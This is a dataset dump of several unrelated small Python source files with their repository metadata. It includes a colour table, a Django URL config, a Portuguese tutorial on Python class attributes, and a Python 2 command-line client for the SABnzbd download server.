'mediumslateblue': (123, 104, 238, 1.0),
'mediumspringgreen': (0, 250, 154, 1.0),
'mediumturquoise': (72, 209, 204, 1.0),
'mediumvioletred': (199, 21, 133, 1.0),
'midnightblue': (25, 25, 112, 1.0),
'mintcream': (245, 255, 250, 1.0),
'mistyrose': (255, 228, 225, 1.0),
'moccasin': (255, 228, 181, 1.0),
'navajowhite': (255, 222, 173, 1.0),
'navy': (0, 0, 128, 1.0),
'oldlace': (253, 245, 230, 1.0),
'olive': (128, 128, 0, 1.0),
'olivedrab': (107, 142, 35, 1.0),
'orange': (255, 165, 0, 1.0),
'orangered': (255, 69, 0, 1.0),
'orchid': (218, 112, 214, 1.0),
'palegoldenrod': (238, 232, 170, 1.0),
'palegreen': (152, 251, 152, 1.0),
'paleturquoise': (175, 238, 238, 1.0),
'palevioletred': (219, 112, 147, 1.0),
'papayawhip': (255, 239, 213, 1.0),
'peachpuff': (255, 218, 185, 1.0),
'peru': (205, 133, 63, 1.0),
'pink': (255, 192, 203, 1.0),
'plum': (221, 160, 221, 1.0),
'powderblue': (176, 224, 230, 1.0),
'purple': (128, 0, 128, 1.0),
'red': (255, 0, 0, 1.0),
'rosybrown': (188, 143, 143, 1.0),
'royalblue': (65, 105, 225, 1.0),
'saddlebrown': (139, 69, 19, 1.0),
'salmon': (250, 128, 114, 1.0),
'sandybrown': (244, 164, 96, 1.0),
'seagreen': (46, 139, 87, 1.0),
'seashell': (255, 245, 238, 1.0),
'sienna': (160, 82, 45, 1.0),
'silver': (192, 192, 192, 1.0),
'skyblue': (135, 206, 235, 1.0),
'slateblue': (106, 90, 205, 1.0),
'slategray': (112, 128, 144, 1.0),
'slategrey': (112, 128, 144, 1.0),
'snow': (255, 250, 250, 1.0),
'springgreen': (0, 255, 127, 1.0),
'steelblue': (70, 130, 180, 1.0),
'tan': (210, 180, 140, 1.0),
'teal': (0, 128, 128, 1.0),
'thistle': (216, 191, 216, 1.0),
'tomato': (255, 99, 71, 1.0),
'turquoise': (64, 224, 208, 1.0),
'violet': (238, 130, 238, 1.0),
'wheat': (245, 222, 179, 1.0),
'white': (255, 255, 255, 1.0),
'whitesmoke': (245, 245, 245, 1.0),
'yellow': (255, 255, 0, 1.0),
'yellowgreen': (154, 205, 50, 1.0),
}
|
[
"iabouelftouh@trudoc24x7.com"
] |
iabouelftouh@trudoc24x7.com
|
2e57626e4bb2e712bdfee4e51a5d28344f6a7fcf
|
3b0ee58fb38780c9a6a81e9c22686adf03e8bdee
|
/publish-events.py
|
9c259eb82b6768103ae81ea1072461a26677961b
|
[] |
no_license
|
gsherwin3/sonic-nas-manifest
|
7061a0f3534c34cfceb612976ccfc789e3b0e43e
|
4c8fe47374d7a65baecb168b2e9ee654761e295d
|
refs/heads/master
| 2020-06-28T21:03:02.069209
| 2016-10-27T16:22:23
| 2016-10-27T16:22:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
# Python code block to publish events
import cps
import cps_utils
# Create handle to connect to event service
handle = cps.event_connect()
# Create CPS object
obj = cps_utils.CPSObject('base-port/interface',qual='observed', data= {"ifindex":23})
# Publish the event
cps.event_send(handle, obj.get())
|
[
"noreply@github.com"
] |
gsherwin3.noreply@github.com
|
79ec10a6c2cd2eb5753da2872644f311bf6deecd
|
f752ca1367a85cf4413d1b0b9403976f2e67f7c7
|
/loo.py
|
7f506ae5dced5ff197167f82f637ce2d933bc0cf
|
[] |
no_license
|
raferalston/proverka
|
0cb3da2111fae2e6fc53da06aa7b9c74bb90b70d
|
b28afe8430fee02b3673dffa622cbd9977084fe5
|
refs/heads/main
| 2023-05-14T22:50:13.031900
| 2021-05-21T13:44:27
| 2021-05-21T13:44:27
| 369,549,662
| 0
| 0
| null | 2021-05-21T13:47:26
| 2021-05-21T13:47:26
| null |
UTF-8
|
Python
| false
| false
| 175
|
py
|
i = int(input())
s = int(input())
y = int(input())
def loo(i, s ,y):
while y != 0:
s = i / 100 * s + s
y = y - 1
return s
print(loo(i, s, y))
|
[
"noreply@github.com"
] |
raferalston.noreply@github.com
|
e43cfc6aa1633a9191785d3f556f8d0272598293
|
130d5455b1974710515ba4761d3b6780315725df
|
/core/orm/common.py
|
13e75a0a5dfe391691999bb199f9ad9f1d95f29c
|
[] |
no_license
|
Illicitus/aiohttp-playground
|
f3711af5aa3ddb5bad4f905b7045f4947684ae70
|
d0fdb54b4a35d5714e43f99c6ef1aee3bd37e107
|
refs/heads/main
| 2023-04-03T06:57:01.488181
| 2021-04-11T18:43:04
| 2021-04-11T18:43:04
| 349,416,149
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 79
|
py
|
from pydantic import ValidationError
from core.responses.json import NotFound
|
[
"honchar.vitalii@gmail.com"
] |
honchar.vitalii@gmail.com
|
18dec9909a2f079119d67538333ae4ba3f2c8476
|
f3ccbc61c9a968e130536f66ec896393ea2ad463
|
/test/tp.py
|
bed900aab528b53223cc14f5438c94f8c3bb02bc
|
[] |
no_license
|
rutikatuscano22/Folder3
|
69f563cf1ec0fe71242bcaf99e7cefc44b70068d
|
59e5ba5e5c91221625567e629e4daf5601ab97ad
|
refs/heads/main
| 2023-04-16T08:26:36.762625
| 2021-04-28T15:49:41
| 2021-04-28T15:49:41
| 362,525,082
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14
|
py
|
print('sdf')
|
[
"noreply@github.com"
] |
rutikatuscano22.noreply@github.com
|
655594a78e371613ede21c222f5abad2afe4b62f
|
907efd02ac6920adac86571f46b89b05644b1e99
|
/apps/courseApp/urls.py
|
094d5c188c9aa63976caa218af96e83c4285d180
|
[] |
no_license
|
RyanGKist/DjangoCourses
|
3f2333fa26dfec5b6fc5492e04f098a26ac1b038
|
877d4f239b930f0089febaffdca870eee325178e
|
refs/heads/master
| 2021-08-14T15:13:42.822507
| 2017-11-16T02:58:13
| 2017-11-16T02:58:13
| 110,915,224
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$' , views.index),
url(r'^courseAdd$', views.course_create),
url(r'^remove(?P<uid>\d+)$', views.destroy),
url(r'^destroy(?P<uid>\d+)$', views.destroy_data)
]
|
[
"RyanGKistner@Patricks-MacBook-Pro-2.local"
] |
RyanGKistner@Patricks-MacBook-Pro-2.local
|
377d8d2bcde9cc96994429bc34f03d2d7d68a11e
|
1d8ce00008e6f6cbb7f2728ea7e7b9af28b1a7c4
|
/guppe/POO/atributos.py
|
23709c67c5114837d0ea26e7fa497e4c92bae1d8
|
[] |
no_license
|
HigorSenna/python-study
|
05d09e09075dc2eb9c4f790928d68aab0c8a18b5
|
9b1a0c5e487b3cd397f371c7c4648148430e13d9
|
refs/heads/master
| 2022-12-03T00:16:53.075812
| 2020-08-17T15:54:01
| 2020-08-17T15:54:01
| 285,556,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,479
|
py
|
"""
Atributos
Em Python, por convenção, ficou estabelecido que todo atributo de uma classe deve ser PUBLICO, caso queira colocar
privado, é so usar __ em sua declaracao
"""
# Classe com atributos privados
class Lampada:
# OBS: Atributos privados: __nome
def __init__(self, voltagem, cor): # Construtor
self.__voltagem = voltagem
self.__cor = cor
self.__ligada = False
@property
def voltagem(self):
return self.__voltagem
@property
def cor(self):
return self.__cor
@property
def ligada(self):
return self.__ligada
class Acesso:
def __init__(self, email, senha):
self.email = email
self.__senha = senha
acesso = Acesso('email@gmail.com', '123456')
print(acesso.email)
# print(acesso.__senha) # AtributeError
# Name Mangling -> conseguimos acessar um atributo mesmo sendo privado (nao recomendado)
print(acesso._Acesso__senha)
# Classe com atributos publicos
class ContaCorrente:
def __init__(self, numero, limite, saldo):
self.numero = numero
self.limite = limite
self.saldo = saldo
# Em python, o primeiro atributo de um método é sempre a referencia do objeto, e como convenção sempre devemos chama-lo
# de self, porém podemos colocar qualquer nome:
class ContaPoupanca:
def __init__(this, numero, limite, saldo):
this.numero = numero
this.limite = limite
this.saldo = saldo
# ATRIBUTOS DE CLASSE (em Java: static)
from random import random
class Produto:
imposto = 1.05 # Atributo de instancia
def __init__(self, nome, valor):
self.id = random()
self.nome = nome
self.valor = (valor * Produto.imposto)
p1 = Produto('PS4', 2300)
print(p1.imposto) # Acesso possivel más incorreto para acesso ao atributo de classe, forma correta:
print(Produto.imposto)
p2 = Produto('PS5', 6000)
# Atributos Dinâmicos (Não comum)
# - É um atributo de instância que pode ser criado em tempo de execução e será exclusivo da instância que o criou
p3 = Produto('Xbox', 2300)
p3.peso = '5Kg' # Note que na classe produto nao existe o atributo peso
print(p3.peso)
# Listando os objetos com seus respectivos valores:
print(p3.__dict__) # Pega os atributos de INSTÂNCIA com seus valores e transforma e retorna um dicionario
# Deletando atributos
del p3.peso
print(p3.__dict__)
del p3.nome
print(p3.__dict__) # Posso deletar qualquer atributo de instância
|
[
"higorrebjfmg@gmail.com"
] |
higorrebjfmg@gmail.com
|
5f3434db4874c48ac89e9ef698be689a2749935d
|
48730c1fcacffd5ada10c6074fbc096e0ce354c9
|
/sabcli.py
|
cff26e65217ffc5a457fc1b51fadd49c8d603159
|
[] |
no_license
|
TobiasTheViking/sabcli
|
d1e8daea1cf686cb78e1983f555bc868810fda1f
|
11ecd604c3a76f78bb5f6dcd4fb714275e3da2c3
|
refs/heads/master
| 2020-05-18T10:51:13.562988
| 2013-04-24T17:38:56
| 2013-04-24T17:38:56
| 9,624,084
| 7
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 27,806
|
py
|
#!/usr/bin/env python
''' Command Line Interface for sabnzbd+
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
COPYING: http://www.gnu.org/licenses/gpl.txt
Copyright 2010 Tobias Ussing
Acknowledgements:
Meethune Bhowmick - For the original code for the 0.4 api
Henrik Mosgaard Jensen - For testing, critique layout and usability.
'''
import os, sys, time, httplib
import xml.etree.ElementTree as ElementTree
import getopt, ConfigParser
from threading import Thread
VERSION="0.5-11"
APIVERSION="0.5.4"
# TextColour
class tc:
black = '\x1B[30;49m'
red = "\x1B[31;49m"
green = '\x1B[32;49m'
yellow = '\x1B[33;49m'
blue = '\x1B[34;49m'
magenta = '\x1B[35;49m'
cyan = '\x1B[36;49m'
white = '\x1B[37;49m'
bold = '\x1B[1;49m'
end = '\x1B[m'
class monitor(Thread):
def __init__ (self, value):
Thread.__init__(self)
self.cont = True
self.delay = value
def run(self):
time.sleep(2)
sys.stdin.readline()
print 'Exiting watch mode after next loop.'
self.cont = False
class SABnzbdCore( object ):
''' Sabnzbd Automation Class '''
def __init__(self, config = None):
self.config = config
if not self.config:
self.config = { 'host' : 'localhost', 'port' : '8080',
'username' : None, 'password;' : None,
'apikey' : None },
# Public Variables
self.fetchpath = ''
self.servername = ''
self.header = {}
self.postdata = None
self.command_status = 'ok'
self.return_data = {}
self.retval = ''
self.url = 'http://' + self.servername + '/sabnzbd/'
self.job_option = '3'
self.debug = None
self.watchdelay = None
self.width = int(os.popen('stty size', 'r').read().split()[1])
# Private Methods
def xml_to_dict(self, el):
d={}
if el.text:
d[el.tag] = el.text
else:
d[el.tag] = None
for child in el:
if child:
if len(child) == 1 or child[0].tag != child[1].tag:
d[child.tag] = self.xml_to_dict(child)
else:
temp = []
for subitem in child:
if subitem.text != None:
temp.append(subitem.text)
else:
temp2 = self.xml_to_dict(subitem)
temp.append(temp2)
d[child.tag] = { subitem.tag : temp }
else:
d[child.tag] = child.text
return d
def __parse_status(self, command, status_obj):
''' Convert web output to boolean value '''
# Web output should only be 'ok\n' or 'error\n'
self.retval = status_obj.lower().strip('\n')
self.command_status = self.retval
if self.retval == 'ok' :
return True
if self.retval == 'error' :
return False
if command in ('version', 'move', 'priority'):
return self.retval
''' Convert status object to python dictionary '''
# Fix broken xml from sabnzbd
if command == 'warnings':
temp = status_obj.replace("<warnings>","<root>\n<warnings>")
status_obj = temp.replace("</warnings>","</warnings></root>")
if command == 'details':
temp = status_obj.replace("<files>","<root>\n<files>")
status_obj = temp.replace("</files>","</files></root>")
try:
status_obj = status_obj.replace('&', '&')
root = ElementTree.XML(status_obj.strip())
self.return_data = self.xml_to_dict(root)
if self.debug:
print
for a in self.return_data.keys():
print "%s - %s" % ( a, self.return_data[a] )
print
self.command_status = 'ok'
except ValueError:
self.command_status = 'error'
return False
return True
def __send_request(self, command, path):
''' Send command to server '''
data = ''
try:
conn = httplib.HTTPConnection(self.servername)
conn.request('POST' if self.postdata else 'GET', path, self.postdata, self.header)
try:
response = conn.getresponse()
except httplib.BadStatusLine:
raise Exception
if response.status != 200:
msg = str(response.status) + ':' + response.reason
raise httplib.HTTPException(msg)
data = response.read()
conn.close()
except httplib.HTTPException, err:
self.command_status = 'http://' + self.servername + path + ' -> ' + err.message
return False
except:
self.command_status = "Cannot connect to " + self.servername + path
return False
return data
# Public Methods
def setConnectionVariables(self):
# Set Connection Variables
self.fetchpath = '/api?apikey=' + self.config ['apikey'] + '&mode='
self.servername = self.config['host'] + ':' + self.config['port']
self.header = { 'User-Agent' : 'SabnzbdAutomation' }
# Setup authentication if needed.
if self.config['username'] and self.config['password']:
self.postdata = 'ma_password=' + self.config['password'] + '&' +\
'ma_username=' + self.config['username']
self.header['Content-type'] = 'application/x-www-form-urlencoded'
else:
self.postdata = None
self.url = 'http://' + self.servername + '/sabnzbd/'
def send_command(self, command, args = None,):
''' http://sabnzbdplus.wiki.sourceforge.net/Automation+Support '''
url_fragment = command
if args == None:
if command in ('version', 'shutdown', 'restart'):
url_fragment += ''
elif command == 'queue':
url_fragment += '&start=START&limit=LIMIT&output=xml'
elif command == 'history':
url_fragment += '&start=START&limit=LIMIT&output=xml'
elif command == 'warnings':
url_fragment += '&output=xml'
elif command == 'pause':
url_fragment = 'pause'
elif command == 'resume':
url_fragment = 'resume'
else:
print 'unhandled command: ' + command
usage(2)
elif len(args) == 1:
if command in ('addfile', 'addurl', 'addid'):
url_fragment += '&name=' + args[0] + '&pp=' + self.job_option
elif command == 'newapikey':
if args[0] == 'confirm':
url_fragment = 'config&name=set_apikey'
else:
print 'unhandled command: ' + command
usage(2)
elif command == 'queuecompleted':
url_fragment = 'queue&name=change_complete_action&value=' + args[0]
elif command == 'pathget':
url_fragment = 'addlocalfile&name=' + args[0]
elif command == 'delete':
url_fragment = 'queue&name=delete&value=' + args[0]
elif command == 'details':
url_fragment = 'get_files&output=xml&value=' + args[0]
elif command == 'speedlimit':
url_fragment = 'config&name=speedlimit&value=' + args[0]
elif command == 'autoshutdown':
if args not in ('0', '1'):
return False
else:
url_fragment += '&name=' + args[0]
elif command == 'pause':
url_fragment = 'queue&name=pause&value=' + args[0]
elif command == 'temppause':
url_fragment = 'config&name=set_pause&value=' + args[0]
elif command == 'resume':
url_fragment = 'queue&name=resume&value=' + args[0]
elif command == 'history':
if args[0] == 'clear':
url_fragment += '&name=delete&value=all'
else:
usage(2)
else:
print 'unhandled command: ' + command
usage(2)
elif len(args) == 2:
if command == 'rename':
url_fragment = 'queue&name=rename&value=' + str(args[0]) + '&value2=' + str(args[1])
elif command == 'priority':
url_fragment = 'queue&name=priority&value=' + str(args[0]) + '&value2=' + str(args[1])
elif command == 'postprocessing':
url_fragment = 'change_opts&value=' + str(args[0]) + '&value2=' + str(args[1])
elif command == 'move':
url_fragment = 'switch&value=' + str(args[0]) + '&value2=' + str(args[1])
else:
print 'unhandled command: ' + command
usage(2)
else:
print 'unhandled command: ' + command
usage(2)
self.url = 'http://' + self.servername + self.fetchpath + url_fragment
if self.debug:
print self.url
data = self.__send_request(command, self.fetchpath + url_fragment)
if data == False:
return False
return self.__parse_status(command, data)
def getNZO_id(self, index = '-1'):
self.send_command('queue')
nzo_id = None
if self.return_data['slots'] != None:
try:
self.return_data['slots']['slot'].keys()
slots = [ self.return_data['slots']['slot'] ]
except AttributeError:
slots = self.return_data['slots']['slot']
for each in slots:
if each['index'] == index:
nzo_id = each['nzo_id']
return nzo_id
def getName(self, nzo_id = ''):
self.send_command('queue')
name = ''
if self.return_data['slots'] != None:
try:
self.return_data['slots']['slot'].keys()
slots = [ self.return_data['slots']['slot'] ]
except AttributeError:
slots = self.return_data['slots']['slot']
for each in slots:
if each['nzo_id'] == nzo_id:
name = each['filename']
return name
def printLine(self, segments):
# Calculate spacing between segments in line.
space = self.width
for segment in segments:
space -= len(segment)
if len(segments) > 1:
space = space / (len(segments)-1)
if space <= 0:
space = 1
# Combine segments with equal spacing
combined = ''
for segment in segments:
combined += segment + " " * space
# Remove trailing whitespaces from above.
return combined.strip()
def insert(self, original, new, pos):
'''Inserts new inside original at pos.'''
return original[:pos] + new + original[pos:]
def print_header(self):
''' Print pretty table with status info '''
if float(self.return_data['mbleft']) / 1024 > float(self.return_data['diskspace2']):
print tc.red + tc.bold + "WARNING:" + tc.end + " Insufficient free disk space left to finish queue.\n"
if float(self.return_data['mbleft']) / 1024 > float(self.return_data['diskspacetotal2']):
print tc.red + tc.bold + "WARNING:" + tc.end + " Insufficient total disk space to finish queue.\n"
preline = 'Free/Total Disk: %.2f / %.2f GB' % \
( float(self.return_data['diskspace2']),
float(self.return_data['diskspacetotal2']) )
if self.return_data['paused'] == 'True':
postline = "Speed: Paused"
else:
postline = "Speed: %.2f kb/s" % float(self.return_data['kbpersec'])
tempLine = self.printLine([preline, postline])
# Adding color. Because of printLine it MUST be done with replace.
tempLine = tempLine.replace('Speed: ', 'Speed: ' + tc.cyan)
tempLine = tempLine.replace('kb/s', tc.end + 'kb/s')
tempLine = tempLine.replace('Paused', 'Paused' + tc.end)
print tempLine
if 'total_size' in self.return_data:
# History view
print(str('Transferred Total: %s - Month: %s - Week: %s' % \
( self.return_data['total_size'], self.return_data['month_size'], self.return_data['week_size'])).center(self.width))
else:
# Queue view or pre 0.5.2 view
print(str('Queue: %.2f / %.2f GB [%2.0f%%] [Up: %s]' % \
( ( float(self.return_data['mb']) -
float(self.return_data['mbleft']) ) / 1024 ,
float(self.return_data['mb']) / 1024,
100*( float(self.return_data['mb']) -
float(self.return_data['mbleft']))/(float(self.return_data['mb'])+0.01), self.return_data['uptime'])).center(self.width))
def print_queue(self):
self.print_header()
print self.printLine(['# - Filename [Age/Priority/Options] (Status)', 'Downloaded/Total (MB) [pct]'])
print '-' * self.width
if self.return_data['slots'] != None:
try:
self.return_data['slots']['slot'].keys()
slots = [ self.return_data['slots']['slot'] ]
except AttributeError:
slots = self.return_data['slots']['slot']
tailLength = 0
for each in slots:
if tailLength < len(each['mb']):
tailLength = len(each['mb'])
tailLength += tailLength
for each in slots:
opts = ['Download', 'Repair', 'Unpack', 'Delete']
# Line 1
print "%s - %s [%s/%s/%s] (%s)" % ( tc.green + each['index'] + tc.end, each['filename'], tc.green + each['avg_age'] + tc.end, tc.green + each['priority'] + tc.end, \
tc.green + opts[int(each['unpackopts'])] + tc.end, tc.green + each['status'] + tc.end )
# Line 2
time = each['timeleft']
if len(each['timeleft']) == 7:
time = "0" + time
tail = "%.2f / %.2f [%2.0f%%]" % ( float(each['mb'])-float(each['mbleft']), float(each['mb']), float(each['percentage']) )
tail2 = "%s%.2f %s/ %s%.2f %s[%s%2.0f%%%s]" % (tc.red, float(each['mb'])-float(each['mbleft']), tc.end, tc.red, float(each['mb']), \
tc.end, tc.red, float(each['percentage']), tc.end )
tail2= " " * ( tailLength + 9 - len(tail)) + tail2
charsLeft = self.width - len(time) - len(tail) - 9 - ( tailLength + 9 - len(tail))
pct = (charsLeft)/100.0 * float(each['percentage'])
progress = "="* int(pct) + ">" + " " * (charsLeft-int(pct))
print " " + tc.red + time + tc.end + " " + tc.bold + tc.yellow + "[" + progress + "]" + tc.end + " " + tail2
print
return True
def print_details(self):
print 'Filename'
print '-' * self.width
if self.return_data['files'] != None:
try:
self.return_data['files']['file'].keys()
files = [ self.return_data['files']['file'] ]
except AttributeError:
files = self.return_data['files']['file']
for each in files:
print each['filename']
print " - [Status: %s] [Downloaded: %s/%s MB]" % ( each['status'], float(each['mb']) - float(each['mbleft']), float(each['mb']) )
print
return True
def print_history(self):
self.print_header()
print 'Filename'
print '-' * self.width
if self.return_data['slots'] != None:
try:
self.return_data['slots']['slot'].keys()
slots = [ self.return_data['slots']['slot'] ]
except AttributeError:
slots = self.return_data['slots']['slot']
slots.reverse()
for each in slots:
print each['name']
par2 = ''
unpack = ''
log = ''
stage_log = each['stage_log']
if stage_log != None:
try:
stage_log['slot'].keys()
items = [ stage_log['slot'] ]
except AttributeError:
items = stage_log['slot']
for item in items:
if item['name'] == "Unpack":
if type(item['actions']['item']) == str:
data = [item['actions']['item']]
else:
data = item['actions']['item']
fail = 0
for subdata in data:
if str.find(subdata, 'Unpacked') != -1:
unpack = '[unpack: ' + tc.green + tc.bold + 'OK' + tc.end +']'
else:
log += " - " + tc.red + subdata + tc.end + "\n"
fail += 1
if fail > 0:
unpack = '[unpack: ' + tc.red + 'FAIL' + tc.end + ']'
elif item['name'] == "Repair":
if type(item['actions']['item']) == str:
data = [item['actions']['item']]
else:
data = item['actions']['item']
fail = 0
for subdata in data:
if str.find(subdata, 'Quick Check OK') != -1:
par2 = '[par2: ' + tc.green + tc.bold + 'OK' + tc.end +']'
elif str.find(subdata, 'Repaired in') != -1:
par2 = '[par2: ' + tc.green + tc.bold + 'OK' + tc.end +']'
else:
log += " - " + subdata.replace("Repair failed", tc.red + "Repair failed") + tc.end + "\n"
fail += 1
if fail > 0:
par2 = '[par2: ' + tc.red + tc.bold + 'FAIL' + tc.end + ']'
print ' - [download: %s] %s %s' % ( each['size'], par2, unpack )
print log
return True
def print_warnings(self):
''' Print pretty table with status info '''
if self.return_data['warnings'] != None:
try:
self.return_data['warnings'].keys()
slots = [ self.return_data['warnings']['warning'] ]
except AttributeError:
slots = self.return_data['warnings']['warning']
if slots[0][0] != 1:
slots = slots[0]
for each in slots:
warning = each.split("\n")
line = "[%s] %s" % ( warning[0], warning[1] )
if len(line) < 33:
line = line + " " * (33-len(line))
line += " | " + warning[2]
print line
print
return True
def print_version(self):
print 'sabcli: ' + VERSION + '\nAPI Version: ' + APIVERSION + '\nSABnzbd Version: ' + self.retval + '\n'
if APIVERSION == self.retval:
print 'Versions match'
else:
print 'Versions mismatch'
return True
def watch(self, command, command_arg):
# s = monitor(self.watchdelay)
# s.start()
# cont = s.cont
while True:
print '\x1B[2J'
print '\x1B[1;1H'
print self.printLine(['Refreshing in : ' + str(self.watchdelay) + ' seconds. Press CTRL-C to quit (can take up to '+ str(self.watchdelay) + ' seconds to quit).', 'Last refresh: ' + time.strftime("%H:%M:%S", time.localtime())])
print
run_commands(self, command, command_arg)
time.sleep(self.watchdelay)
# s.join()
print
def usage(exitval):
''' Usage '''
msg = sys.argv[0].split('/').pop()
msg += " " + tc.cyan + "<command> <args>" + tc.end + "\n\n"
msg += "Compatible with SABnzbd+: " + APIVERSION + "\n\n"
msg += "Commands:\n\tpause " + tc.cyan + "[id]" + tc.end + "\n\tresume " + tc.cyan + "[id]" + tc.end + "\n\tshutdown\n\trestart\n\tversion\n\tqueue\t\t\t\t(watchable)\n\twarnings\t\t\t(watchable)\n\tdetails " + tc.cyan + "<id>" + tc.end + "\t\t\t(watchable)\n\tmove " + tc.cyan + "<id> <new position>" + tc.end + " \n"
msg += "\thistory " + tc.cyan + "[clear]" + tc.end + "\t\t\t(watchable)\n\tnewapikey " + tc.cyan + "<confirm>" + tc.end + "\n\tspeedlimit " + tc.cyan + "<value>" + tc.end + "\n\tnewzbin " + tc.cyan + "<id>" + tc.end + "\n\taddurl " + tc.cyan + "<nzb url>" + tc.end + "\n\tpathget " + tc.cyan + "<nzb path>" + tc.end + "\n\ttemppause " + tc.cyan + "<minutes>" + tc.end + "\n"
msg += "\trename " + tc.cyan + "<id> <newname>" + tc.end + "\n\tdelete " + tc.cyan + "<id>" + tc.end + "\t\t\t| all = clear queue. Multiple id's can be given\n\tpriority " + tc.cyan + "<id> <value>" + tc.end + "\t\t| -1 = Low, 0 = Normal, 1 = High, 2 = Force\n"
msg += "\tpostprocessing " + tc.cyan + "<id> <value>" + tc.end + "\t| 0 = Skip, 1 = Repair, 2 = Unpack, 3 = Delete\n"
msg += "\tqueuecompleted " + tc.cyan + "<path to script>" + tc.end + "\t| implemented, not confirmed\n";
msg += "\nArguments:\n\t-h [--help]\t\t\tHelp screen\n\t-j [--job-option=3]\t\tSet job-option\n\t-H [--hostname=localhost]\tHostname\n\t-P [--port=8080]\t\tPort\n"
msg += "\t-u [--username=user]\t\tUsername\n\t-p [--password=pass]\t\tPassword\n\t-a [--apikey=15433acd...]\tApikey\n\t-w [--watch=X]\t\t\tRerun command every X seconds\n\t\t\t\t\tStandard action is 'queue'\n\t\t\t\t\tCan watch all commands marked (watchable)\n"
msg += "\nEnvironment variables:\n\tSABCLICFG=~/.nzbrc (default)\n\tDEBUG=1\t\t\t\t| Enable debug\n"
sys.stderr.write(msg + '\n')
sys.exit(exitval)
def parse_options(sabnzbd, options):
''' Parse Cli options '''
default_opts = ("hj:H:P:u:p:a:w:" , ["help" , "job-option=", "hostname=", "port=", "username=", "password=", "apikey=", "watch="])
command = None
command_args = None
try:
opt , args = getopt.getopt(options, default_opts[0], default_opts[1])
except getopt.GetoptError:
usage(2)
for option , arguement in opt:
if option in ("-h", "--help"):
usage(2)
elif option in ("-j", "--job-option"):
self.job_option = str(arguement)
elif option in ("-H", "--hostname"):
sabnzbd.config['host'] = str(arguement)
elif option in ("-P", "--port"):
sabnzbd.config['port'] = str(arguement)
elif option in ("-u", "--username"):
sabnzbd.config['password'] = str(arguement)
elif option in ("-p", "--password"):
sabnzbd.config['password'] = str(arguement)
elif option in ("-a", "--apikey"):
sabnzbd.config['apikey'] = str(arguement)
elif option in ("-w", "--watch"):
sabnzbd.watchdelay = int(arguement)
if len(args) == 0:
command = 'queue'
else:
command = args[0]
if len(args) > 1:
command_args = args[1:]
return (command, command_args)
def parse_config(config):
''' Parse config file for server info '''
parser = ConfigParser.ConfigParser()
config_dict = {}
try:
config_file = open(config)
parser.readfp(config_file)
config_file.close()
except IOError:
usage(1)
sys.stderr.write('Unable to open ' + config + '\n')
try:
for each in ('host', 'port', 'username', 'password', 'apikey'):
config_dict[each] = parser.get('server', each)
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
sys.stderr.write('Unable to parse ' + config + '\n')
sys.stderr.write('Format should be:\n')
sys.stderr.write('[server]\n')
sys.stderr.write('host = <sabnzbd server>\n')
sys.stderr.write('port = <sabnzbd port>\n')
sys.stderr.write('username = <sabnzbd name> | None\n')
sys.stderr.write('password = <sabnzbd password> | None\n')
sys.stderr.write('apikey = <sabnzbd apikey> | None\n')
usage(1)
return config_dict
def run_commands(sabnzbd, command, command_arg):
    # Resolve queue indices to NZO ids, send the command to the SABnzbd
    # server and pretty-print the result. Returns 2 on id-lookup failure,
    # otherwise None. NOTE: Python 2 code (print statements).
    if command in ('rename', 'move', 'priority', 'postprocessing', 'pause', 'resume', 'details'):
        # These commands take a queue index as the first argument;
        # translate it to the server's NZO id first.
        if command_arg != None:
            command_arg[0] = sabnzbd.getNZO_id(command_arg[0])
            if command_arg[0] == None:
                print tc.red + 'Error:' + tc.end + ' No NZO_ID returned, please make sure you provided the correct index id.\n'
                return 2
    if command == 'delete':
        if command_arg != None:
            if command_arg[0] != 'all':
                # Build a comma-separated string of NZO ids for the delete call.
                temp = None
                for each in command_arg:
                    pretemp = sabnzbd.getNZO_id(each)
                    if pretemp:
                        # NOTE(review): this OVERWRITES temp on every
                        # iteration instead of appending, so only the last
                        # valid id is deleted when several are given —
                        # looks like a bug; confirm before relying on
                        # multi-item delete.
                        temp = str(pretemp) + ','
                    else:
                        print tc.red + 'Error:' + tc.end + ' No NZO_ID returned, please make sure you provided the correct index id.\n'
                if temp:
                    command_arg = [temp[:-1]]  # strip trailing comma
                else:
                    return 2
    if sabnzbd.send_command(command, command_arg):
        # Command accepted by the server: render per-command output.
        if command == 'queue':
            sabnzbd.print_queue()
        elif command == 'history':
            if command_arg == None:
                sabnzbd.print_history()
            else:
                print 'History Cleared'
                print
        elif command == 'details':
            sabnzbd.print_details()
        elif command == 'warnings':
            sabnzbd.print_warnings()
        elif command == 'version':
            sabnzbd.print_version()
        elif command == 'priority':
            if sabnzbd.debug:
                print 'New position in queue: ' + sabnzbd.retval
            sabnzbd.command_status = sabnzbd.command_status.replace(sabnzbd.retval, "ok\n");
        elif command == 'move':
            value = sabnzbd.retval.split(' ')
            if sabnzbd.debug:
                print 'New position in queue: ' + value[0]
            sabnzbd.command_status = sabnzbd.command_status.replace(sabnzbd.retval, "ok");
        elif command == 'speedlimit':
            if command_arg[0] == '0':
                # A limit of 0 means "no limit" on the server side.
                print 'Speedlimit set to: Unlimited'
            else:
                print 'Speedlimit set to: ' + command_arg[0] + 'KB/s'
        elif command in ('newapikey', 'shutdown', 'restart', 'queuecompleted'):
            print command + ' -> ' + sabnzbd.command_status
        elif command in ('addurl', 'addfile', 'addid', 'delete', 'pause', 'resume', 'rename', 'postprocessing'):
            if sabnzbd.debug:
                print command + ' -> ' + sabnzbd.command_status
    else:
        print 'No command run: ' + sabnzbd.url
    # NOTE(review): ('newapikey') is a plain string, not a 1-tuple, so this
    # is a substring test; it only works because command == 'newapikey'
    # matches exactly. A trailing comma was probably intended.
    if command in ('newapikey'):
        print sabnzbd.command_status
def main():
